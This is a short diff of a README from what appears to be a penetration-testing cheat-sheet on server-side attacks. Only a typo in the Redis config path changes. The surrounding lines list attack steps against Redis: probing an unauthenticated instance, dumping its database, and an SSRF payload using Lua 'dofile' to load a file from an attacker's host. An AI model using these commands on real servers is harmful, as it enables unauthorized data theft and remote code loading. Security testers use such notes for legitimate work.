seeu-inspace/easyg/server-side-attacks/README.md

   - try command `info`
   - if no login, run the command: `config get *`
 - To dump the db: `redis-utils` and `redis-dump`
-- Deafult config file: `/etc/redis/redis.conf`
+- Default config file: `/etc/redis/redis.conf`

 **SSRF**
 - eval "dofile('//myip/share')" 0